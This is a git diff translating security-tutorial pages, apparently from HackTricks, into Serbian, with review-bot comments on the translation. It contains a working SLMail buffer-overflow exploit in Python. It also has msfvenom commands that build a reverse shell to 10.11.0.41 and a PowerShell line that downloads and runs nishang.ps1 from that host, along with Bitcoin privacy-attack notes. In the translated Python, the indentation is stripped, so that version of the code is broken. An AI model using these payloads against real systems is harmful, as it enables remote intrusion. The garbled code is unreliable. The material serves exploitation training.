Function**: In this function, we declare an integer variable `uninitializedVar` without initializing it. When we attempt to print its value, the output might show a random number. This number represents whatever data was previously at that memory location. 
Depending on the environment and compiler, the actual output can vary, and sometimes, for safety, some compilers might automatically initialize variables to zero, though this should not be relied upon. -- **`main` Function**: The `main` function calls both of the above functions in sequence, demonstrating the contrast between an initialized variable and an uninitialized one. +## ARM64 Primer -## ARM64 Example - -This doesn't change at all in ARM64 as local variables are also managed in the stack, you can [**check this example**](https://8ksec.io/arm64-reversing-and-exploitation-part-6-exploiting-an-uninitialized-stack-variable-vulnerability/) were this is shown. +Ovo se uopšte ne menja u ARM64 jer se lokalne promenljive takođe upravljaju na steku, možete [**proveriti ovaj primer**](https://8ksec.io/arm64-reversing-and-exploitation-part-6-exploiting-an-uninitialized-stack-variable-vulnerability/) gde je ovo prikazano. {{#include ../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md b/src/binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md index fb6f62862..13f239c0c 100644 --- a/src/binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md +++ b/src/binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md @@ -1,21 +1,18 @@ -# Windows Exploiting (Basic Guide - OSCP lvl) +# Windows Exploiting (Osnovni vodič - OSCP nivo) {{#include ../banners/hacktricks-training.md}} -## **Start installing the SLMail service** +## **Počnite sa instalacijom SLMail servisa** -## Restart SLMail service - -Every time you need to **restart the service SLMail** you can do it using the windows console: +## Ponovo pokrenite SLMail servis +Svaki put kada treba da **ponovo pokrenete servis SLMail** možete to uraditi koristeći Windows konzolu: ``` net start slmail ``` - ![](<../images/image (988).png>) -## Very basic python exploit template - +## Veoma osnovni python exploit šablon ```python #!/usr/bin/python 
@@ -27,99 +24,89 @@ port = 110 buffer = 'A' * 2700 try: - print "\nLaunching exploit..." - s.connect((ip, port)) - data = s.recv(1024) - s.send('USER username' +'\r\n') - data = s.recv(1024) - s.send('PASS ' + buffer + '\r\n') - print "\nFinished!." +print "\nLaunching exploit..." +s.connect((ip, port)) +data = s.recv(1024) +s.send('USER username' +'\r\n') +data = s.recv(1024) +s.send('PASS ' + buffer + '\r\n') +print "\nFinished!." except: - print "Could not connect to "+ip+":"+port +print "Could not connect to "+ip+":"+port ``` +## **Promenite font Immunity Debuggera** -## **Change Immunity Debugger Font** +Idite na `Options >> Appearance >> Fonts >> Change(Consolas, Blod, 9) >> OK` -Go to `Options >> Appearance >> Fonts >> Change(Consolas, Blod, 9) >> OK` - -## **Attach the proces to Immunity Debugger:** +## **Priključite proces na Immunity Debugger:** **File --> Attach** ![](<../images/image (869).png>) -**And press START button** +**I pritisnite START dugme** -## **Send the exploit and check if EIP is affected:** +## **Pošaljite exploit i proverite da li je EIP pogođen:** ![](<../images/image (906).png>) -Every time you break the service you should restart it as is indicated in the beginnig of this page. +Svaki put kada prekinete servis, trebate ga ponovo pokrenuti kao što je naznačeno na početku ove stranice. -## Create a pattern to modify the EIP +## Napravite obrazac za modifikaciju EIP-a -The pattern should be as big as the buffer you used to broke the service previously. +Obrazac bi trebao biti dovoljno velik kao bafer koji ste koristili da prekinete servis prethodno. ![](<../images/image (420).png>) - ``` /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000 ``` +Promenite bafer eksploita i postavite obrazac, a zatim pokrenite eksploataciju. -Change the buffer of the exploit and set the pattern and lauch the exploit. 
- -A new crash should appeard, but with a different EIP address: +Treba da se pojavi novi pad, ali sa drugačijom EIP adresom: ![](<../images/image (636).png>) -Check if the address was in your pattern: +Proverite da li je adresa bila u vašem obrascu: ![](<../images/image (418).png>) - ``` /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q 39694438 ``` +Izgleda da **možemo modifikovati EIP na offsetu 2606** bafera. -Looks like **we can modify the EIP in offset 2606** of the buffer. - -Check it modifing the buffer of the exploit: - +Proverite to modifikujući bafer eksploita: ``` buffer = 'A'*2606 + 'BBBB' + 'CCCC' ``` - -With this buffer the EIP crashed should point to 42424242 ("BBBB") +Sa ovim baferom, EIP se srušio i treba da pokazuje na 42424242 ("BBBB"). ![](<../images/image (874).png>) ![](<../images/image (92).png>) -Looks like it is working. +Izgleda da funkcioniše. -## Check for Shellcode space inside the stack +## Proverite prostor za Shellcode unutar steka -600B should be enough for any powerfull shellcode. - -Lets change the bufer: +600B bi trebalo da bude dovoljno za bilo koji moćan shellcode. +Hajde da promenimo bafer: ``` buffer = 'A'*2606 + 'BBBB' + 'C'*600 ``` - -launch the new exploit and check the EBP and the length of the usefull shellcode +pokrenite novi exploit i proverite EBP i dužinu korisnog shellcode-a ![](<../images/image (119).png>) ![](<../images/image (879).png>) -You can see that when the vulnerability is reached, the EBP is pointing to the shellcode and that we have a lot of space to locate a shellcode here. +Možete videti da kada se dođe do ranjivosti, EBP pokazuje na shellcode i da imamo puno prostora da lociramo shellcode ovde. -In this case we have **from 0x0209A128 to 0x0209A2D6 = 430B.** Enough. +U ovom slučaju imamo **od 0x0209A128 do 0x0209A2D6 = 430B.** Dovoljno. 
-## Check for bad chars - -Change again the buffer: +## Proverite loše karaktere +Ponovo promenite bafer: ``` badchars = ( "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" @@ -141,30 +128,27 @@ badchars = ( ) buffer = 'A'*2606 + 'BBBB' + badchars ``` +Loši karakteri počinju od 0x01 jer je 0x00 gotovo uvek loš. -The badchars starts in 0x01 because 0x00 is almost always bad. +Izvršavajte eksploataciju ponovo sa ovim novim baferom brišući karaktere za koje se utvrdi da su beskorisni: -Execute repeatedly the exploit with this new buffer delenting the chars that are found to be useless:. +Na primer: -For example: - -In this case you can see that **you shouldn't use the char 0x0A** (nothing is saved in memory since the char 0x09). +U ovom slučaju možete videti da **ne biste trebali koristiti karakter 0x0A** (ništa se ne čuva u memoriji pošto je karakter 0x09). ![](<../images/image (111).png>) -In this case you can see that **the char 0x0D is avoided**: +U ovom slučaju možete videti da **se karakter 0x0D izbegava**: ![](<../images/image (1098).png>) -## Find a JMP ESP as a return address - -Using: +## Pronađite JMP ESP kao povratnu adresu +Koristeći: ``` !mona modules #Get protections, look for all false except last one (Dll of SO) ``` - -You will **list the memory maps**. Search for some DLl that has: +Ćete **navesti mape memorije**. Potražite neki DLL koji ima: - **Rebase: False** - **SafeSEH: False** 
@@ -174,30 +158,25 @@ You will **list the memory maps**. Search for some DLl that has: ![](<../images/image (555).png>) -Now, inside this memory you should find some JMP ESP bytes, to do that execute: - +Sada, unutar ove memorije trebali biste pronaći neke JMP ESP bajtove, da biste to uradili, izvršite: ``` !mona find -s "\xff\xe4" -m name_unsecure.dll # Search for opcodes insie dll space (JMP ESP) !mona find -s "\xff\xe4" -m slmfc.dll # Example in this case ``` - -**Then, if some address is found, choose one that don't contain any badchar:** +**Zatim, ako se pronađe neka adresa, izaberite onu koja ne sadrži nikakve badchar:** ![](<../images/image (605).png>) -**In this case, for example: \_0x5f4a358f**\_ - -## Create shellcode +**U ovom slučaju, na primer: \_0x5f4a358f**\_ +## Kreirajte shellcode ``` msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.41 LPORT=443 -f c -b '\x00\x0a\x0d' msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://10.11.0.41/nishang.ps1')\"" -f python -b '\x00\x0a\x0d' ``` +Ako eksploatacija ne funkcioniše, ali bi trebala (možete videti sa ImDebg da je shellcode dostignut), pokušajte da kreirate druge shellcode-ove (msfvenom sa kreiranjem različitih shellcode-ova za iste parametre). -If the exploit is not working but it should (you can see with ImDebg that the shellcode is reached), try to create other shellcodes (msfvenom with create different shellcodes for the same parameters). - -**Add some NOPS at the beginning** of the shellcode and use it and the return address to JMP ESP, and finish the exploit: - +**Dodajte neke NOPS na početak** shellcode-a i koristite ga zajedno sa povratnom adresom za JMP ESP, i završite eksploataciju: ```bash #!/usr/bin/python 
@@ -236,26 +215,23 @@ shellcode = ( buffer = 'A' * 2606 + '\x8f\x35\x4a\x5f' + "\x90" * 8 + shellcode try: - print "\nLaunching exploit..." - s.connect((ip, port)) - data = s.recv(1024) - s.send('USER username' +'\r\n') - data = s.recv(1024) - s.send('PASS ' + buffer + '\r\n') - print "\nFinished!." +print "\nLaunching exploit..." +s.connect((ip, port)) +data = s.recv(1024) +s.send('USER username' +'\r\n') +data = s.recv(1024) +s.send('PASS ' + buffer + '\r\n') +print "\nFinished!." except: - print "Could not connect to "+ip+":"+port +print "Could not connect to "+ip+":"+port ``` - > [!WARNING] -> There are shellcodes that will **overwrite themselves**, therefore it's important to always add some NOPs before the shellcode +> Postoje shellcode-ovi koji će **prepisati sebe**, stoga je važno uvek dodati nekoliko NOP-ova pre shellcode-a -## Improving the shellcode - -Add this parameters: +## Poboljšanje shellcode-a +Dodajte ove parametre: ```bash EXITFUNC=thread -e x86/shikata_ga_nai ``` - {{#include ../banners/hacktricks-training.md}} diff --git a/src/blockchain/blockchain-and-crypto-currencies/README.md b/src/blockchain/blockchain-and-crypto-currencies/README.md index c897d0035..56c792059 100644 --- a/src/blockchain/blockchain-and-crypto-currencies/README.md +++ b/src/blockchain/blockchain-and-crypto-currencies/README.md 
@@ -1,180 +1,176 @@ {{#include ../../banners/hacktricks-training.md}} -## Basic Concepts +## Osnovni Koncepti -- **Smart Contracts** are defined as programs that execute on a blockchain when certain conditions are met, automating agreement executions without intermediaries. -- **Decentralized Applications (dApps)** build upon smart contracts, featuring a user-friendly front-end and a transparent, auditable back-end. -- **Tokens & Coins** differentiate where coins serve as digital money, while tokens represent value or ownership in specific contexts. - - **Utility Tokens** grant access to services, and **Security Tokens** signify asset ownership. -- **DeFi** stands for Decentralized Finance, offering financial services without central authorities. -- **DEX** and **DAOs** refer to Decentralized Exchange Platforms and Decentralized Autonomous Organizations, respectively. +- **Pametni ugovori** definišu se kao programi koji se izvršavaju na blockchain-u kada su ispunjeni određeni uslovi, automatizujući izvršenja sporazuma bez posrednika. +- **Decentralizovane aplikacije (dApps)** se oslanjaju na pametne ugovore, imajući korisnički prijatan front-end i transparentan, auditable back-end. +- **Tokeni i Kovanice** se razlikuju, pri čemu kovanice služe kao digitalni novac, dok tokeni predstavljaju vrednost ili vlasništvo u specifičnim kontekstima. +- **Utility tokeni** omogućavaju pristup uslugama, a **Security tokeni** označavaju vlasništvo nad imovinom. +- **DeFi** označava decentralizovane finansije, nudeći finansijske usluge bez centralnih vlasti. +- **DEX** i **DAO** se odnose na decentralizovane berzanske platforme i decentralizovane autonomne organizacije, redom. 
-## Consensus Mechanisms +## Mehanizmi Konsenzusa -Consensus mechanisms ensure secure and agreed transaction validations on the blockchain: +Mehanizmi konsenzusa osiguravaju sigurne i dogovorene validacije transakcija na blockchain-u: -- **Proof of Work (PoW)** relies on computational power for transaction verification. -- **Proof of Stake (PoS)** demands validators to hold a certain amount of tokens, reducing energy consumption compared to PoW. +- **Proof of Work (PoW)** se oslanja na računarsku snagu za verifikaciju transakcija. +- **Proof of Stake (PoS)** zahteva od validatora da drže određenu količinu tokena, smanjujući potrošnju energije u poređenju sa PoW. -## Bitcoin Essentials +## Osnovne Informacije o Bitcoinu -### Transactions +### Transakcije -Bitcoin transactions involve transferring funds between addresses. Transactions are validated through digital signatures, ensuring only the owner of the private key can initiate transfers. +Bitcoin transakcije uključuju prebacivanje sredstava između adresa. Transakcije se validiraju putem digitalnih potpisa, osiguravajući da samo vlasnik privatnog ključa može inicirati transfere. -#### Key Components: +#### Ključne Komponente: -- **Multisignature Transactions** require multiple signatures to authorize a transaction. -- Transactions consist of **inputs** (source of funds), **outputs** (destination), **fees** (paid to miners), and **scripts** (transaction rules). +- **Multisignature transakcije** zahtevaju više potpisa za autorizaciju transakcije. +- Transakcije se sastoje od **ulaza** (izvor sredstava), **izlaza** (odredište), **naknada** (plaćene rudarima) i **skripti** (pravila transakcije). ### Lightning Network -Aims to enhance Bitcoin's scalability by allowing multiple transactions within a channel, only broadcasting the final state to the blockchain. +Cilj je poboljšati skalabilnost Bitcoina omogućavanjem više transakcija unutar kanala, samo emitovanjem konačnog stanja na blockchain. 
-## Bitcoin Privacy Concerns +## Problemi Privatnosti Bitcoina -Privacy attacks, such as **Common Input Ownership** and **UTXO Change Address Detection**, exploit transaction patterns. Strategies like **Mixers** and **CoinJoin** improve anonymity by obscuring transaction links between users. +Napadi na privatnost, kao što su **Common Input Ownership** i **UTXO Change Address Detection**, koriste obrasce transakcija. Strategije poput **Mixers** i **CoinJoin** poboljšavaju anonimnost zamagljujući veze transakcija između korisnika. -## Acquiring Bitcoins Anonymously +## Sticanje Bitcoina Anonimno -Methods include cash trades, mining, and using mixers. **CoinJoin** mixes multiple transactions to complicate traceability, while **PayJoin** disguises CoinJoins as regular transactions for heightened privacy. +Metode uključuju gotovinske trgovine, rudarenje i korišćenje miksera. **CoinJoin** meša više transakcija kako bi otežao praćenje, dok **PayJoin** prikriva CoinJoins kao obične transakcije radi povećane privatnosti. -# Bitcoin Privacy Atacks +# Napadi na Privatnost Bitcoina -# Summary of Bitcoin Privacy Attacks +# Sažetak Napada na Privatnost Bitcoina -In the world of Bitcoin, the privacy of transactions and the anonymity of users are often subjects of concern. Here's a simplified overview of several common methods through which attackers can compromise Bitcoin privacy. +U svetu Bitcoina, privatnost transakcija i anonimnost korisnika često su predmet zabrinutosti. Evo pojednostavljenog pregleda nekoliko uobičajenih metoda kroz koje napadači mogu kompromitovati privatnost Bitcoina. -## **Common Input Ownership Assumption** +## **Pretpostavka Zajedničkog Vlasništva Ulaza** -It is generally rare for inputs from different users to be combined in a single transaction due to the complexity involved. Thus, **two input addresses in the same transaction are often assumed to belong to the same owner**. 
+Generalno je retko da se ulazi različitih korisnika kombinuju u jednoj transakciji zbog složenosti koja je uključena. Tako se **dve adrese ulaza u istoj transakciji često pretpostavljaju da pripadaju istom vlasniku**. -## **UTXO Change Address Detection** +## **UTXO Adresa Promene Detekcija** -A UTXO, or **Unspent Transaction Output**, must be entirely spent in a transaction. If only a part of it is sent to another address, the remainder goes to a new change address. Observers can assume this new address belongs to the sender, compromising privacy. +UTXO, ili **Unspent Transaction Output**, mora biti potpuno potrošen u transakciji. Ako se samo deo pošalje na drugu adresu, ostatak ide na novu adresu promene. Posmatrači mogu pretpostaviti da ova nova adresa pripada pošiljaocu, kompromitujući privatnost. -### Example +### Primer -To mitigate this, mixing services or using multiple addresses can help obscure ownership. +Da bi se to ublažilo, usluge mešanja ili korišćenje više adresa mogu pomoći u zamagljivanju vlasništva. -## **Social Networks & Forums Exposure** +## **Izloženost Društvenih Mreža i Foruma** -Users sometimes share their Bitcoin addresses online, making it **easy to link the address to its owner**. +Korisnici ponekad dele svoje Bitcoin adrese online, što olakšava **povezivanje adrese sa njenim vlasnikom**. -## **Transaction Graph Analysis** +## **Analiza Transakcionih Grafova** -Transactions can be visualized as graphs, revealing potential connections between users based on the flow of funds. +Transakcije se mogu vizualizovati kao grafovi, otkrivajući potencijalne veze između korisnika na osnovu toka sredstava. -## **Unnecessary Input Heuristic (Optimal Change Heuristic)** +## **Heuristika Nepotrebnog Ulaza (Optimalna Heuristika Promene)** -This heuristic is based on analyzing transactions with multiple inputs and outputs to guess which output is the change returning to the sender. 
- -### Example +Ova heuristika se zasniva na analizi transakcija sa više ulaza i izlaza kako bi se pogodilo koji izlaz je promena koja se vraća pošiljaocu. +### Primer ```bash 2 btc --> 4 btc 3 btc 1 btc ``` +Ako dodavanje više ulaza čini da promena izlaza bude veća od bilo kog pojedinačnog ulaza, to može zbuniti heuristiku. -If adding more inputs makes the change output larger than any single input, it can confuse the heuristic. +## **Prisilna Ponovna Upotreba Adresa** -## **Forced Address Reuse** +Napadači mogu slati male iznose na prethodno korišćene adrese, nadajući se da će primalac kombinovati ove sa drugim ulazima u budućim transakcijama, čime se povezuju adrese. -Attackers may send small amounts to previously used addresses, hoping the recipient combines these with other inputs in future transactions, thereby linking addresses together. +### Ispravno Ponašanje Novčanika -### Correct Wallet Behavior +Novčanici bi trebali izbegavati korišćenje kovanica primljenih na već korišćenim, praznim adresama kako bi sprečili ovaj gubitak privatnosti. -Wallets should avoid using coins received on already used, empty addresses to prevent this privacy leak. +## **Druge Tehnike Analize Blokčejna** -## **Other Blockchain Analysis Techniques** +- **Tačni Iznosi Plaćanja:** Transakcije bez promene su verovatno između dve adrese koje poseduje isti korisnik. +- **Celi Brojevi:** Celi broj u transakciji sugeriše da je to plaćanje, pri čemu je ne-celi izlaz verovatno promena. +- **Otisak Novčanika:** Različiti novčanici imaju jedinstvene obrasce kreiranja transakcija, što omogućava analitičarima da identifikuju korišćen softver i potencijalno adresu promene. +- **Korelacije Iznosa i Vremena:** Otkriće vremena ili iznosa transakcija može učiniti transakcije tragovima. -- **Exact Payment Amounts:** Transactions without change are likely between two addresses owned by the same user. 
-- **Round Numbers:** A round number in a transaction suggests it's a payment, with the non-round output likely being the change. -- **Wallet Fingerprinting:** Different wallets have unique transaction creation patterns, allowing analysts to identify the software used and potentially the change address. -- **Amount & Timing Correlations:** Disclosing transaction times or amounts can make transactions traceable. +## **Analiza Saobraćaja** -## **Traffic Analysis** +Praćenjem mrežnog saobraćaja, napadači mogu potencijalno povezati transakcije ili blokove sa IP adresama, ugrožavajući privatnost korisnika. Ovo je posebno tačno ako entitet upravlja mnogim Bitcoin čvorovima, što poboljšava njihovu sposobnost praćenja transakcija. -By monitoring network traffic, attackers can potentially link transactions or blocks to IP addresses, compromising user privacy. This is especially true if an entity operates many Bitcoin nodes, enhancing their ability to monitor transactions. +## Više -## More +Za sveobuhvatan spisak napada na privatnost i odbrana, posetite [Bitcoin Privacy on Bitcoin Wiki](https://en.bitcoin.it/wiki/Privacy). -For a comprehensive list of privacy attacks and defenses, visit [Bitcoin Privacy on Bitcoin Wiki](https://en.bitcoin.it/wiki/Privacy). +# Anonimne Bitcoin Transakcije -# Anonymous Bitcoin Transactions +## Načini za Sticanje Bitcoina Anonimno -## Ways to Get Bitcoins Anonymously +- **Transakcije Gotovinom**: Sticanje bitcoina putem gotovine. +- **Alternativne Gotovine**: Kupovina poklon kartica i njihova razmena online za bitcoin. +- **Rudarenje**: Najprivatnija metoda za zarađivanje bitcoina je kroz rudarenje, posebno kada se radi samostalno, jer rudarske grupe mogu znati IP adresu rudara. [Informacije o Rudarskim Grupama](https://en.bitcoin.it/wiki/Pooled_mining) +- **Krađa**: Teoretski, krađa bitcoina bi mogla biti još jedan način za njegovo anonimno sticanje, iako je to ilegalno i nije preporučljivo. 
-- **Cash Transactions**: Acquiring bitcoin through cash. -- **Cash Alternatives**: Purchasing gift cards and exchanging them online for bitcoin. -- **Mining**: The most private method to earn bitcoins is through mining, especially when done alone because mining pools may know the miner's IP address. [Mining Pools Information](https://en.bitcoin.it/wiki/Pooled_mining) -- **Theft**: Theoretically, stealing bitcoin could be another method to acquire it anonymously, although it's illegal and not recommended. +## Servisi za Mešanje -## Mixing Services - -By using a mixing service, a user can **send bitcoins** and receive **different bitcoins in return**, which makes tracing the original owner difficult. Yet, this requires trust in the service not to keep logs and to actually return the bitcoins. Alternative mixing options include Bitcoin casinos. +Korišćenjem servisa za mešanje, korisnik može **poslati bitcoine** i primiti **različite bitcoine u zamenu**, što otežava praćenje originalnog vlasnika. Ipak, ovo zahteva poverenje u servis da ne čuva evidenciju i da zaista vrati bitcoine. Alternativne opcije mešanja uključuju Bitcoin kockarnice. ## CoinJoin -**CoinJoin** merges multiple transactions from different users into one, complicating the process for anyone trying to match inputs with outputs. Despite its effectiveness, transactions with unique input and output sizes can still potentially be traced. +**CoinJoin** spaja više transakcija od različitih korisnika u jednu, komplikujući proces za svakoga ko pokušava da uskladi ulaze sa izlazima. I pored svoje efikasnosti, transakcije sa jedinstvenim ulaznim i izlaznim veličinama i dalje se mogu potencijalno pratiti. -Example transactions that may have used CoinJoin include `402d3e1df685d1fdf82f36b220079c1bf44db227df2d676625ebcbee3f6cb22a` and `85378815f6ee170aa8c26694ee2df42b99cff7fa9357f073c1192fff1f540238`. 
+Primeri transakcija koje su možda koristile CoinJoin uključuju `402d3e1df685d1fdf82f36b220079c1bf44db227df2d676625ebcbee3f6cb22a` i `85378815f6ee170aa8c26694ee2df42b99cff7fa9357f073c1192fff1f540238`. -For more information, visit [CoinJoin](https://coinjoin.io/en). For a similar service on Ethereum, check out [Tornado Cash](https://tornado.cash), which anonymizes transactions with funds from miners. +Za više informacija, posetite [CoinJoin](https://coinjoin.io/en). Za sličnu uslugu na Ethereum-u, pogledajte [Tornado Cash](https://tornado.cash), koja anonimizuje transakcije sa sredstvima od rudara. ## PayJoin -A variant of CoinJoin, **PayJoin** (or P2EP), disguises the transaction among two parties (e.g., a customer and a merchant) as a regular transaction, without the distinctive equal outputs characteristic of CoinJoin. This makes it extremely hard to detect and could invalidate the common-input-ownership heuristic used by transaction surveillance entities. - +Varijanta CoinJoin, **PayJoin** (ili P2EP), prikriva transakciju između dve strane (npr. kupca i trgovca) kao redovnu transakciju, bez karakterističnih jednakih izlaza koji su karakteristični za CoinJoin. Ovo čini izuzetno teškim otkrivanje i moglo bi da poništi heuristiku zajedničkog vlasništva ulaza koju koriste entiteti za nadzor transakcija. ```plaintext 2 btc --> 3 btc 5 btc 4 btc ``` +Transakcije poput gornjih mogu biti PayJoin, poboljšavajući privatnost dok ostaju neprepoznatljive od standardnih bitcoin transakcija. -Transactions like the above could be PayJoin, enhancing privacy while remaining indistinguishable from standard bitcoin transactions. +**Korišćenje PayJoin-a može značajno ometati tradicionalne metode nadzora**, čineći ga obećavajućim razvojem u potrazi za transakcionom privatnošću. -**The utilization of PayJoin could significantly disrupt traditional surveillance methods**, making it a promising development in the pursuit of transactional privacy. 
+# Najbolje prakse za privatnost u kriptovalutama -# Best Practices for Privacy in Cryptocurrencies +## **Tehnike sinhronizacije novčanika** -## **Wallet Synchronization Techniques** +Da bi se održala privatnost i sigurnost, sinhronizacija novčanika sa blockchain-om je ključna. Dve metode se ističu: -To maintain privacy and security, synchronizing wallets with the blockchain is crucial. Two methods stand out: +- **Puni čvor**: Preuzimanjem celog blockchain-a, puni čvor osigurava maksimalnu privatnost. Sve transakcije ikada izvršene se čuvaju lokalno, što onemogućava protivnicima da identifikuju koje transakcije ili adrese korisnik zanima. +- **Filtriranje blokova na klijentskoj strani**: Ova metoda uključuje kreiranje filtera za svaki blok u blockchain-u, omogućavajući novčanicima da identifikuju relevantne transakcije bez izlaganja specifičnih interesa posmatračima mreže. Laki novčanici preuzimaju ove filtere, preuzimajući pune blokove samo kada se pronađe podudaranje sa adresama korisnika. -- **Full node**: By downloading the entire blockchain, a full node ensures maximum privacy. All transactions ever made are stored locally, making it impossible for adversaries to identify which transactions or addresses the user is interested in. -- **Client-side block filtering**: This method involves creating filters for every block in the blockchain, allowing wallets to identify relevant transactions without exposing specific interests to network observers. Lightweight wallets download these filters, only fetching full blocks when a match with the user's addresses is found. +## **Korišćenje Tora za anonimnost** -## **Utilizing Tor for Anonymity** +S obzirom na to da Bitcoin funkcioniše na peer-to-peer mreži, preporučuje se korišćenje Tora za maskiranje vaše IP adrese, poboljšavajući privatnost prilikom interakcije sa mrežom. 
-Given that Bitcoin operates on a peer-to-peer network, using Tor is recommended to mask your IP address, enhancing privacy when interacting with the network. +## **Prevencija ponovne upotrebe adresa** -## **Preventing Address Reuse** +Da bi se zaštitila privatnost, važno je koristiti novu adresu za svaku transakciju. Ponovna upotreba adresa može kompromitovati privatnost povezivanjem transakcija sa istim entitetom. Moderni novčanici obeshrabruju ponovnu upotrebu adresa kroz svoj dizajn. -To safeguard privacy, it's vital to use a new address for every transaction. Reusing addresses can compromise privacy by linking transactions to the same entity. Modern wallets discourage address reuse through their design. +## **Strategije za privatnost transakcija** -## **Strategies for Transaction Privacy** +- **Više transakcija**: Deljenje uplate na nekoliko transakcija može zamagliti iznos transakcije, ometajući napade na privatnost. +- **Izbegavanje promena**: Odabir transakcija koje ne zahtevaju promene poboljšava privatnost ometajući metode detekcije promena. +- **Više izlaza za promenu**: Ako izbegavanje promene nije izvodljivo, generisanje više izlaza za promenu može i dalje poboljšati privatnost. -- **Multiple transactions**: Splitting a payment into several transactions can obscure the transaction amount, thwarting privacy attacks. -- **Change avoidance**: Opting for transactions that don't require change outputs enhances privacy by disrupting change detection methods. -- **Multiple change outputs**: If avoiding change isn't feasible, generating multiple change outputs can still improve privacy. +# **Monero: Svetionik anonimnosti** -# **Monero: A Beacon of Anonymity** +Monero odgovara na potrebu za apsolutnom anonimnošću u digitalnim transakcijama, postavljajući visoke standarde za privatnost. -Monero addresses the need for absolute anonymity in digital transactions, setting a high standard for privacy. 
+# **Ethereum: Gas i transakcije** -# **Ethereum: Gas and Transactions** +## **Razumevanje gasa** -## **Understanding Gas** +Gas meri računski napor potreban za izvršavanje operacija na Ethereum-u, a cena je u **gwei**. Na primer, transakcija koja košta 2,310,000 gwei (ili 0.00231 ETH) uključuje gas limit i osnovnu naknadu, uz napojnicu za podsticanje rudara. Korisnici mogu postaviti maksimalnu naknadu kako bi osigurali da ne preplate, a višak se vraća. -Gas measures the computational effort needed to execute operations on Ethereum, priced in **gwei**. For example, a transaction costing 2,310,000 gwei (or 0.00231 ETH) involves a gas limit and a base fee, with a tip to incentivize miners. Users can set a max fee to ensure they don't overpay, with the excess refunded. +## **Izvršavanje transakcija** -## **Executing Transactions** +Transakcije u Ethereum-u uključuju pošiljaoca i primaoca, koji mogu biti adrese korisnika ili pametnih ugovora. One zahtevaju naknadu i moraju biti rudarene. Osnovne informacije u transakciji uključuju primaoca, potpis pošiljaoca, vrednost, opcione podatke, gas limit i naknade. Značajno je da se adresa pošiljaoca deducira iz potpisa, eliminišući potrebu za njom u podacima transakcije. -Transactions in Ethereum involve a sender and a recipient, which can be either user or smart contract addresses. They require a fee and must be mined. Essential information in a transaction includes the recipient, sender's signature, value, optional data, gas limit, and fees. Notably, the sender's address is deduced from the signature, eliminating the need for it in the transaction data. +Ove prakse i mehanizmi su osnovni za svakoga ko želi da se angažuje sa kriptovalutama dok prioritet daje privatnosti i sigurnosti. -These practices and mechanisms are foundational for anyone looking to engage with cryptocurrencies while prioritizing privacy and security. 
- -## References +## Reference - [https://en.wikipedia.org/wiki/Proof_of_stake](https://en.wikipedia.org/wiki/Proof_of_stake) - [https://www.mycryptopedia.com/public-key-private-key-explained/](https://www.mycryptopedia.com/public-key-private-key-explained/) diff --git a/src/burp-suite.md b/src/burp-suite.md index 680a21a9e..31ef832f0 100644 --- a/src/burp-suite.md +++ b/src/burp-suite.md @@ -4,7 +4,7 @@ - **Jednostavna lista:** Samo lista koja sadrži jedan unos u svakoj liniji - **Runtime fajl:** Lista koja se čita u runtime-u (nije učitana u memoriju). Za podršku velikim listama. -- **Izmena slučaja:** Primeni neke promene na listu stringova (Bez promene, na mala slova, na VELIKA slova, na Prvo slovo - Prvo veliko slovo, a ostala mala-, na Prvo ime - Prvo veliko slovo, a ostalo ostaje isto-). +- **Izmena slučaja:** Primeni neke promene na listu stringova (Bez promene, na mala slova, na VELIKA slova, na pravilno ime - Prvo veliko slovo i ostalo na mala slova, na Pravilno ime - Prvo veliko slovo, a ostalo ostaje isto). - **Brojevi:** Generiši brojeve od X do Y koristeći Z korak ili nasumično. - **Brute Forcer:** Skup karaktera, minimalna i maksimalna dužina. diff --git a/src/crypto-and-stego/blockchain-and-crypto-currencies.md b/src/crypto-and-stego/blockchain-and-crypto-currencies.md index 71b79f58f..46fd5b59a 100644 --- a/src/crypto-and-stego/blockchain-and-crypto-currencies.md +++ b/src/crypto-and-stego/blockchain-and-crypto-currencies.md 
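Review bot: In the src/blockchain hunk the Bitcoin sense of "change" (the change output returned to the sender) is translated as "promena" (an alteration), so `+- **Izbegavanje promena**: Odabir transakcija koje ne zahtevaju promene...` and `+- **Više izlaza za promenu**` read as "avoiding changes" rather than avoiding change outputs; the Serbian term for a change output is "kusur", so these should be "Izbegavanje kusura" / "Više izlaza za kusur" and the explanation "metode detekcije promena" should become "metode detekcije kusura". Smaller wording issues in the same hunk: `+- **Alternativne Gotovine**` ("alternative cashes") for "Cash Alternatives" should be "Alternativa gotovini", and "koja anonimizuje transakcije sa sredstvima od rudara" keeps the source's imprecise description of Tornado Cash unchanged, which is acceptable for a translation pass but worth flagging upstream.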
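Review bot: In the src/burp-suite.md hunk the two proper-name options in `+- **Izmena slučaja:** ... na pravilno ime - Prvo veliko slovo i ostalo na mala slova, na Pravilno ime - Prvo veliko slovo, a ostalo ostaje isto` are now distinguishable only by the capital P, which is easy to miss and does not mirror Burp's option names; describe them by behaviour instead ("Prvo slovo veliko, ostala mala" vs "Prvo slovo veliko, ostala nepromenjena") and keep Burp's original English option names in parentheses so the reader can match them in the Intruder UI. Also, "Izmena slučaja" translates "case" as an instance/event rather than letter case; "Izmena veličine slova" is the correct rendering.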
@@ -1,180 +1,176 @@ {{#include ../banners/hacktricks-training.md}} -## Basic Concepts +## Osnovni Koncepti -- **Smart Contracts** are defined as programs that execute on a blockchain when certain conditions are met, automating agreement executions without intermediaries. -- **Decentralized Applications (dApps)** build upon smart contracts, featuring a user-friendly front-end and a transparent, auditable back-end. -- **Tokens & Coins** differentiate where coins serve as digital money, while tokens represent value or ownership in specific contexts. - - **Utility Tokens** grant access to services, and **Security Tokens** signify asset ownership. -- **DeFi** stands for Decentralized Finance, offering financial services without central authorities. -- **DEX** and **DAOs** refer to Decentralized Exchange Platforms and Decentralized Autonomous Organizations, respectively. +- **Pametni Ugovori** definišu se kao programi koji se izvršavaju na blockchain-u kada su ispunjeni određeni uslovi, automatizujući izvršenja ugovora bez posrednika. +- **Decentralizovane Aplikacije (dApps)** se oslanjaju na pametne ugovore, 